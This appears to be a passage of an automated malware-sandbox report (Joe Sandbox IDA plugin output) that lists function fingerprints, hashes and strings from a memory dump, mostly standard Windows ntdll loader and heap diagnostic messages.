                                                                                                                • Opcode Fuzzy Hash: fb93a7bf095fc1731631be06b429d5f23355cfcc5e1fe35edac94dc000ae8750
                                                                                                                • Instruction Fuzzy Hash: FF3111716443029BD324EB6AD986E1BB795AFE4B14F05051EF9456B3A1E630EC08C7A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 01452DF0: LdrInitializeThunk.NTDLL ref: 01452DFA
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01450BA3
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01450BB6
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01450D60
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01450D74
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 1404860816-0
                                                                                                                • Opcode ID: 1dec5f6d85d7d6a58a1f53b32787eef730936838d3dc91f590eaf82ed77e5c87
                                                                                                                • Instruction ID: 4a92fb46ed0183b66e04e64c8fcd7b44f7d6e1ce975d2ea19e67b15a392b7edf
                                                                                                                • Opcode Fuzzy Hash: 1dec5f6d85d7d6a58a1f53b32787eef730936838d3dc91f590eaf82ed77e5c87
                                                                                                                • Instruction Fuzzy Hash: 2C426A75900715DFDB61CF28C880BAAB7F4BF44314F1445AAE989EB352E770AA85CF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                • API String ID: 0-379654539
                                                                                                                • Opcode ID: 8cbc58f638d9811d86ef7291f5e3a67be370938a09bb4a3ec96c9b52bc0c6808
                                                                                                                • Instruction ID: a1bfb6ed71f35a2cce48638a0fadb70ffa07b5e90526ff6f534d3781b70a7ddb
                                                                                                                • Opcode Fuzzy Hash: 8cbc58f638d9811d86ef7291f5e3a67be370938a09bb4a3ec96c9b52bc0c6808
                                                                                                                • Instruction Fuzzy Hash: E2C189742093828FD711CF58C144BAABBE4BF94704F14486BF9968B369E774CA4ACB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01448421
                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0144855E
                                                                                                                • @, xrefs: 01448591
                                                                                                                • LdrpInitializeProcess, xrefs: 01448422
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-1918872054
                                                                                                                • Opcode ID: 986f18e0147a3af0a057c47aba2c9f8033767b1f52bf5ed7b0c06469b8b62e19
                                                                                                                • Instruction ID: d99d20e1fcf019e8ae27e31946987eb48b526e5d72ec558739cd55dfba62e248
                                                                                                                • Opcode Fuzzy Hash: 986f18e0147a3af0a057c47aba2c9f8033767b1f52bf5ed7b0c06469b8b62e19
                                                                                                                • Instruction Fuzzy Hash: 61918F71508346AFE721EF66CC40EAFBAE8BF94744F40092FFA8496161E774D944CB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014822B6
                                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014821D9, 014822B1
                                                                                                                • .Local, xrefs: 014428D8
                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 014821DE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                • API String ID: 0-1239276146
                                                                                                                • Opcode ID: 66ee062c1cce22aa7e8d7509757051e31b61ffd89aa0c1c43e467cd4a8ae5488
                                                                                                                • Instruction ID: 9598bca63d75a3c6fbaa5c888a5b61d7ad860acc2b57f2cd44c6cc1d7576e90a
                                                                                                                • Opcode Fuzzy Hash: 66ee062c1cce22aa7e8d7509757051e31b61ffd89aa0c1c43e467cd4a8ae5488
                                                                                                                • Instruction Fuzzy Hash: 75A1C635A002299BEB25DF59D884FAAB7B0BF58314F1541EBE908A7361D7709E81CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • RtlDeactivateActivationContext, xrefs: 01483425, 01483432, 01483451
                                                                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0148342A
                                                                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01483456
                                                                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01483437
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                • API String ID: 0-1245972979
                                                                                                                • Opcode ID: d50bab0539787a5177169baf27aa30ea3db42928f3217d70367e4dc711ed8f78
                                                                                                                • Instruction ID: 5fbf459a89dcffb88217f1beb05dee0777e1de22ef07da729476edd053cf11e8
                                                                                                                • Opcode Fuzzy Hash: d50bab0539787a5177169baf27aa30ea3db42928f3217d70367e4dc711ed8f78
                                                                                                                • Instruction Fuzzy Hash: BE6100326407129BE722DF1DC841B2BBBA5BB90F10F19852EE9559B361D734E801CB95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01470FE5
                                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0147106B
                                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01471028
                                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014710AE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                • API String ID: 0-1468400865
                                                                                                                • Opcode ID: 7aa863bb52210dfb9a7b1dd7865966ea3ad54a8b9a8d726e7f9ed235c72d1f83
                                                                                                                • Instruction ID: e651f434301a62e8dfd5fdd01d851869e106b28bb666290db8bc5ccc16818953
                                                                                                                • Opcode Fuzzy Hash: 7aa863bb52210dfb9a7b1dd7865966ea3ad54a8b9a8d726e7f9ed235c72d1f83
                                                                                                                • Instruction Fuzzy Hash: 5B71E0B19043059FCB21DF15C884B9B7FA8AFA4764F00046EFD498B2AAD374D588CBD2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • LdrpDynamicShimModule, xrefs: 0147A998
                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0147A9A2
                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0147A992
                                                                                                                • apphelp.dll, xrefs: 01432462
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-176724104
                                                                                                                • Opcode ID: 0f0af69b8405e093c888343203036004d21fca3571f35390dcc8a9d6a79ca3ae
                                                                                                                • Instruction ID: 1de5628bb533e0291a691b8a9ed69d8dbf124b4f67ef995da790811cc32e3303
                                                                                                                • Opcode Fuzzy Hash: 0f0af69b8405e093c888343203036004d21fca3571f35390dcc8a9d6a79ca3ae
                                                                                                                • Instruction Fuzzy Hash: 24314CB1600202EBDB329F9D9841EAF77B4FF94704F2A002FE9116B365C7B05956D780
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • HEAP: , xrefs: 01423264
                                                                                                                • HEAP[%wZ]: , xrefs: 01423255
                                                                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0142327D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                • API String ID: 0-617086771
                                                                                                                • Opcode ID: 4b0fe50202fb2297990fb6044ed62222351b871041e6c7005f6d732a96c22574
                                                                                                                • Instruction ID: 800d8df90f8afd86a45f99a8fe5d7a8a88b5ed7db78512f0e22ac49fe3a00b2c
                                                                                                                • Opcode Fuzzy Hash: 4b0fe50202fb2297990fb6044ed62222351b871041e6c7005f6d732a96c22574
                                                                                                                • Instruction Fuzzy Hash: DA92D0709042699FDB25CF69C440BAEBBF1FF48310F54809EE859AB361D778A986CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                • API String ID: 0-4253913091
                                                                                                                • Opcode ID: 2ce866ffba288361565cbd2a7e0a5d9e6144c5abc4bcdaceee191029e4f13990
                                                                                                                • Instruction ID: 744b49658982bc1aa2b73196e74fe43f9a4341fdf550157073d3e1884a49c553
                                                                                                                • Opcode Fuzzy Hash: 2ce866ffba288361565cbd2a7e0a5d9e6144c5abc4bcdaceee191029e4f13990
                                                                                                                • Instruction Fuzzy Hash: 72F19A70B00616DFEB25CF69C894BAAB7F5FB44304F54816AE4169F3A1D734E981CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: $@
                                                                                                                • API String ID: 2994545307-1077428164
                                                                                                                • Opcode ID: 9ea19def53ea859cd60d217177de36fcddf0eb51d7f1034e9c61b8a53280b7ed
                                                                                                                • Instruction ID: 550edf24e3d2a46c4a577cefac2dc21047ac5090be5cbe85164584a585d66b5f
                                                                                                                • Opcode Fuzzy Hash: 9ea19def53ea859cd60d217177de36fcddf0eb51d7f1034e9c61b8a53280b7ed
                                                                                                                • Instruction Fuzzy Hash: 60C292B16083429FE725CF29C481BABBBE5AFC8714F05892EE9C987361D734D845CB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                • API String ID: 0-2779062949
                                                                                                                • Opcode ID: 8031f10780b02d9cc5381c1b541832c53147ddb58e60873ade9c147d42b3b7ce
                                                                                                                • Instruction ID: e775fa05aca2bb2122051e0e8f559fc19f009987ec0ac5021371457bd70cc14c
                                                                                                                • Opcode Fuzzy Hash: 8031f10780b02d9cc5381c1b541832c53147ddb58e60873ade9c147d42b3b7ce
                                                                                                                • Instruction Fuzzy Hash: D9A16C719012299BDB31DF69CC88BEAB7B8EF58714F1001EAE908A7260D7359EC5CF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • LdrpCheckModule, xrefs: 0147A117
                                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 0147A10F
                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0147A121
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-161242083
                                                                                                                • Opcode ID: f7c07bdcfdc415f97b4059c065b4d73f650d1be7e3e5908ccb7389b1ead20e79
                                                                                                                • Instruction ID: e4b47257d2c991f3afa465c0b38b5f51832ec135915d17772ecdbf5e721cdf08
                                                                                                                • Opcode Fuzzy Hash: f7c07bdcfdc415f97b4059c065b4d73f650d1be7e3e5908ccb7389b1ead20e79
                                                                                                                • Instruction Fuzzy Hash: 8471F770A00206DFDB2ADFA9C841ABEB7F4FF88604F19412EE9119B365D734AD46CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                • API String ID: 0-1334570610
                                                                                                                • Opcode ID: ee2655d536ee50d77b5acdbf5ce9d71e53bec95655cac540ae50b4266defecda
                                                                                                                • Instruction ID: 62badc6f3340a572aa0aba7365713c4ee6dfce181773fc8ed3194ac514e929e7
                                                                                                                • Opcode Fuzzy Hash: ee2655d536ee50d77b5acdbf5ce9d71e53bec95655cac540ae50b4266defecda
                                                                                                                • Instruction Fuzzy Hash: D761AB706003129FDB29CF69C484BAABBE1FF54704F54856EE8598F3A2D770E881CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 014882DE
                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 014882E8
                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 014882D7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-1783798831
                                                                                                                • Opcode ID: cf1096a921eee2b63a88c8cd3814b30443d3e6251f5c10c1572ca305c4da54aa
                                                                                                                • Instruction ID: cc892be8638a4a8508b4519b0335f249271123e1d10d476a0fe5fa23638906bb
                                                                                                                • Opcode Fuzzy Hash: cf1096a921eee2b63a88c8cd3814b30443d3e6251f5c10c1572ca305c4da54aa
                                                                                                                • Instruction Fuzzy Hash: A9412471141312ABE722EBA9DC80B5B7BE8AF68650F05452FF9589B2B1E770D804CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • PreferredUILanguages, xrefs: 014CC212
                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 014CC1C5
                                                                                                                • @, xrefs: 014CC1F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                • API String ID: 0-2968386058
                                                                                                                • Opcode ID: fe0e7a2262ba02e43be7c26cd22ed69f2d5871ff8d9bc63e451fbe2715008d73
                                                                                                                • Instruction ID: d28993cc8d716038daa6f563e1842f10e1ab4a31614f0474662865d2fe266861
                                                                                                                • Opcode Fuzzy Hash: fe0e7a2262ba02e43be7c26cd22ed69f2d5871ff8d9bc63e451fbe2715008d73
                                                                                                                • Instruction Fuzzy Hash: 85417475E00219EBDF51DFD9C891FEEBBB9AB14B00F04406FEA09A7260D7749A45CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                • API String ID: 0-1373925480
                                                                                                                • Opcode ID: e0e18005942fbcf9169cea7affe02c45bf2c7365d820df4c5dd26592034a806b
                                                                                                                • Instruction ID: 2a42ed10778d039668a10e3a17dd5a1428692619e02d64944ee0f0e0ae513e67
                                                                                                                • Opcode Fuzzy Hash: e0e18005942fbcf9169cea7affe02c45bf2c7365d820df4c5dd26592034a806b
                                                                                                                • Instruction Fuzzy Hash: F941E532A002588BEB25DBE9C844BADBBB4FF75344F5D046BD901EB7A2D6B49901CB10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • LdrpCheckRedirection, xrefs: 0149488F
                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01494888
                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01494899
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                • API String ID: 0-3154609507
                                                                                                                • Opcode ID: 31681c29dba6e719f53d88794904afe1b301150bed6e244b0bf70c4aab931c65
                                                                                                                • Instruction ID: 3562fa43e5c10fa2f46c860e1ce2258ddb1e03c97fff85faeba872017115716f
                                                                                                                • Opcode Fuzzy Hash: 31681c29dba6e719f53d88794904afe1b301150bed6e244b0bf70c4aab931c65
                                                                                                                • Instruction Fuzzy Hash: 7B41D036A142558FCF22CE59DA40A2B7FE4AF49A54B0A059FED589B371E330D802CB81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                • API String ID: 0-2558761708
                                                                                                                • Opcode ID: 5c35386220914a4adccbcb2d4cc736cc3bbda7877317ad231b1805bd19ee6387
                                                                                                                • Instruction ID: 9b51813b91a2a0c01b16c4de0134a33b542a9945036e1a82f8d4a271a617f296
                                                                                                                • Opcode Fuzzy Hash: 5c35386220914a4adccbcb2d4cc736cc3bbda7877317ad231b1805bd19ee6387
                                                                                                                • Instruction Fuzzy Hash: 7511AC313541129FDA2ACB1AC454BAABBE4EB5061AF58812FF406CF2B1DB30E881C754
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01492104
                                                                                                                • Process initialization failed with status 0x%08lx, xrefs: 014920F3
                                                                                                                • LdrpInitializationFailure, xrefs: 014920FA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-2986994758
                                                                                                                • Opcode ID: 4705c13d79ab9169572c7c0e20bf6468508d98d4d8250e40c0419c9a52873c9d
                                                                                                                • Instruction ID: 565610ed3d323427f15f4becab4949371ae783d7c8b78570ace856a37fea528b
                                                                                                                • Opcode Fuzzy Hash: 4705c13d79ab9169572c7c0e20bf6468508d98d4d8250e40c0419c9a52873c9d
                                                                                                                • Instruction Fuzzy Hash: E3F0AF75640308BFEB24E64D9C47F9A3B68EB50B58F11005EFB047B392E2F0AA548A91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: #%u
                                                                                                                • API String ID: 48624451-232158463
                                                                                                                • Opcode ID: 1b2e69e2cbe5ecc14c2bc3a79864c5b20a2d96ef1232e78577562e9524b23853
                                                                                                                • Instruction ID: 1efda603242c62ca1ee9977df377fbeda10d104f09732553a10fb8e4cb1af600
                                                                                                                • Opcode Fuzzy Hash: 1b2e69e2cbe5ecc14c2bc3a79864c5b20a2d96ef1232e78577562e9524b23853
                                                                                                                • Instruction Fuzzy Hash: 58715C71A0015A9FDB01DFA9C984BAEB7F8FF18704F15406AE905E7261EB34ED41CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • LdrResSearchResource Enter, xrefs: 0141AA13
                                                                                                                • LdrResSearchResource Exit, xrefs: 0141AA25
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                • API String ID: 0-4066393604
                                                                                                                • Opcode ID: 3b53057eec1678d0e5d0d9b6ef7e7f2f2da502c29ae981d84415b64979b30622
                                                                                                                • Instruction ID: c233b4599fa3bdb8036d6d05f1a7e21e546e4ce9e3b69fa37489adc5161aee86
                                                                                                                • Opcode Fuzzy Hash: 3b53057eec1678d0e5d0d9b6ef7e7f2f2da502c29ae981d84415b64979b30622
                                                                                                                • Instruction Fuzzy Hash: F4E1A271A012999BEF22CF99C944BEEBBB9FF14350F24042BEA01E7369D7749941CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `$`
                                                                                                                • API String ID: 0-197956300
                                                                                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                • Instruction ID: ef3729df041a085a7bd4dd5bf348b9466db6cda862742e4303ddf43d50adb4f4
                                                                                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                • Instruction Fuzzy Hash: 63C1E3312043429BEB24CF29C864B6BBBE5BFD4318F284A2EF696C72A0D774D505CB41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: Legacy$UEFI
                                                                                                                • API String ID: 2994545307-634100481
                                                                                                                • Opcode ID: 94f2a2ee0d4b9372b2dbf44fcb7f8a1400832606326fe6572d8a45141d406dd2
                                                                                                                • Instruction ID: 2817f1d7e7e480548e1765ba2afeede7a8ee40884cdcc84714749310a07d814e
                                                                                                                • Opcode Fuzzy Hash: 94f2a2ee0d4b9372b2dbf44fcb7f8a1400832606326fe6572d8a45141d406dd2
                                                                                                                • Instruction Fuzzy Hash: D9618B71E103099FDB14EFA9C940BAEBBB9FB54704F14402EEA49EB2A1D731E941CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
